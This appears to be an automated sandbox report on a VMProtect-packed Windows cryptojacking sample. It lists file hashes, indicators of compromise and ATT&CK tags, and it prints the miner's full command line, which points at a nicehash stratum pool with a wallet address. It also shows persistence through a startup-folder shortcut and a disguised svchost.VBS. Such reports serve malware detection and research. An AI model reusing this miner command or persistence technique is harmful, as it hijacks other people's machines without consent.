a65d885d904cc0f2d2452d4c2b8c58db5eb04153e45a3ce081d3f50d767e5e22

General

Target

876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe
Size

1.6MB
MD5

876cf2c8f925c3a8a29d254f34ca1d0d
SHA1

b6e4acdc4fa514a9d879878249c223e946114e09
SHA256

a65d885d904cc0f2d2452d4c2b8c58db5eb04153e45a3ce081d3f50d767e5e22
SHA512

25fce95c3722da3bc992762f2ba79db2e966870c0b11cc4701a7e1fc66f9c75da34f8521e70e01e518141edb6949c6a1a754520a03292f857629825fdefa78ee
SSDEEP

49152:Ae6wBw10h/e9uUdu7XUIvoMoSzxWTnHGQvPM/9Dft:AeD9WuvtY7pHMD

Score

7^/10

vmprotect

Malware Config

Signatures

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk	876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe

Executes dropped EXE 1 IoCs

pid	Process
2120	csrs.exe

Loads dropped DLL 1 IoCs

pid	Process
2036	WScript.exe

VMProtect packed file 5 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/files/0x0008000000015b85-9.dat	vmprotect
behavioral1/memory/2036-11-0x0000000003E40000-0x00000000041AB000-memory.dmp	vmprotect
behavioral1/memory/2120-13-0x0000000000CB0000-0x000000000101B000-memory.dmp	vmprotect
behavioral1/memory/2120-14-0x0000000000CB0000-0x000000000101B000-memory.dmp	vmprotect
behavioral1/memory/2120-34-0x0000000000CB0000-0x000000000101B000-memory.dmp	vmprotect

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2120	csrs.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	2120	csrs.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 2084 wrote to memory of 2036	2084	876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe	28
PID 2084 wrote to memory of 2036	2084	876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe	28
PID 2084 wrote to memory of 2036	2084	876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe	28
PID 2084 wrote to memory of 2036	2084	876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe	28
PID 2084 wrote to memory of 2036	2084	876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe	28
PID 2084 wrote to memory of 2036	2084	876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe	28
PID 2084 wrote to memory of 2036	2084	876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe	28
PID 2036 wrote to memory of 2120	2036	WScript.exe	30
PID 2036 wrote to memory of 2120	2036	WScript.exe	30
PID 2036 wrote to memory of 2120	2036	WScript.exe	30
PID 2036 wrote to memory of 2120	2036	WScript.exe	30
PID 2036 wrote to memory of 2120	2036	WScript.exe	30
PID 2036 wrote to memory of 2120	2036	WScript.exe	30
PID 2036 wrote to memory of 2120	2036	WScript.exe	30

C:\Users\Admin\AppData\Local\Temp\876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:2084
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\svchost.VBS"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2036
- - C:\ProgramData\Windows\csrs.exe
    "C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 19e8n98DfHt3un2eEQuYCZGron5z3dBZiZ -p x -t 14
    3⤵
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of AdjustPrivilegeToken
    PID:2120

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Windows\1717168018_log.txt

Filesize
1KB

MD5
10a4980a649ae016d4a106509cc6b2cd

SHA1
bc5659e371a030c2b1fd6b8d843696ca7134e7a8

SHA256
6bf1d641c0ec27802f15a890ff1710a28eeafe910eb53a17f4064ba7ffdc8a58

SHA512
0984029d6882a950a94a0911543bf54d0c0c2264d9920aed48503572ab549fc84f697b6bae41b879e8af2531e3ed4247287fc99128dca50b96c8cc9e15164db4

Download Submit
C:\ProgramData\Windows\1717168018_log.txt

Filesize
2KB

MD5
2d46d4649b39c32106e1ef71c8427a62

SHA1
3b2a65a52c8cf6e8d7c4f9c8c0d0c1f242caec3b

SHA256
5b31b2225fe8a815f915a0cb9b49f7f975d6973ff63584bcbbd2ed8e84d33966

SHA512
e7476e8868af547f9f6d8efa74d5f22f0368f52da2d61b66c122e4afa2bb83e4ecc9d3cd4e7c2e04fcbeb379f0258707965867483ae66985f3f3d7a7556e26ee

Download Submit
C:\ProgramData\Windows\1717168018_log.txt

Filesize
3KB

MD5
78ca3a5f64db1857aa751c8c57071546

SHA1
28d4ecd1718145e61c201e82ab512f86b0079fa3

SHA256
ca2ce44b90ca1d059c2e7eb657cb2f8ba19db62ba630a1606b0ed41d87b2391d

SHA512
647cf1b977d90183e11ff4f98d33335e965b0899f5cadb9413ccd2ca0c407dd150f994d8e5a1e9cf9367e62d885eee59e36fccf5c5517ed6b4fe3ff4ca44c836

Download Submit
C:\ProgramData\Windows\1717168018_log.txt

Filesize
4KB

MD5
a55cc7f2dafc60f48f03c47a144e0623

SHA1
c0397cccbdec7e2b7ab1fa93f785e0f811a29055

SHA256
72c4021b709c39c8d719f50bc16769f4e45de8faee23327be63aa721352c2d88

SHA512
e60d4ebbff640275402ff512bc8bd629ef0c2b2b6f46607fcf46a70be80b6d4f21d8ef4199d0880c70824464e2626171f72e41e924a703b0c52188e3ed8d456a

Download Submit
C:\ProgramData\Windows\csrs.exe

Filesize
1.4MB

MD5
e3427d9f439aebefa3d9c299e2a94af3

SHA1
ffff4672790378677ec30d3634fc593c10dfd37e

SHA256
7374051e75ae97ba687cd153927faccd21fcdcc0b41a42867d38ac62064f6aba

SHA512
a9ffc1a3436a26b162b8933f628b6f5014b7cd5678625a479ddf6ad0ff32a50b916c2041265fa0fc6cc99fcf0c63e30eb4811cf8099cc0baf2b718647ce4160b

Download Submit
C:\ProgramData\Windows\svchost.vbs

Filesize
1KB

MD5
96d540f4b7c1b7074e5f135432a3592d

SHA1
c380a1b024dcb58296a30c258d294ca3249d6f08

SHA256
44af45c732ab1f051e9c849086af7384c78fe7faaa2049c844b3b014a5af5e70

SHA512
d3589dff318c752a3913fd489f3a1c6b6e1898f051d97cb6e546d3d4a8339732992705eaa1af27d29e8c41eb7a229ea597df406be5a312d2070226f503be514b

Download Submit
memory/2036-11-0x0000000003E40000-0x00000000041AB000-memory.dmp

Filesize
3.4MB

Download
memory/2036-33-0x0000000003E40000-0x00000000041AB000-memory.dmp

Filesize
3.4MB

Download
memory/2120-13-0x0000000000CB0000-0x000000000101B000-memory.dmp

Filesize
3.4MB

Download
memory/2120-14-0x0000000000CB0000-0x000000000101B000-memory.dmp

Filesize
3.4MB

Download
memory/2120-34-0x0000000000CB0000-0x000000000101B000-memory.dmp

Filesize
3.4MB

Download

Analysis

Sharing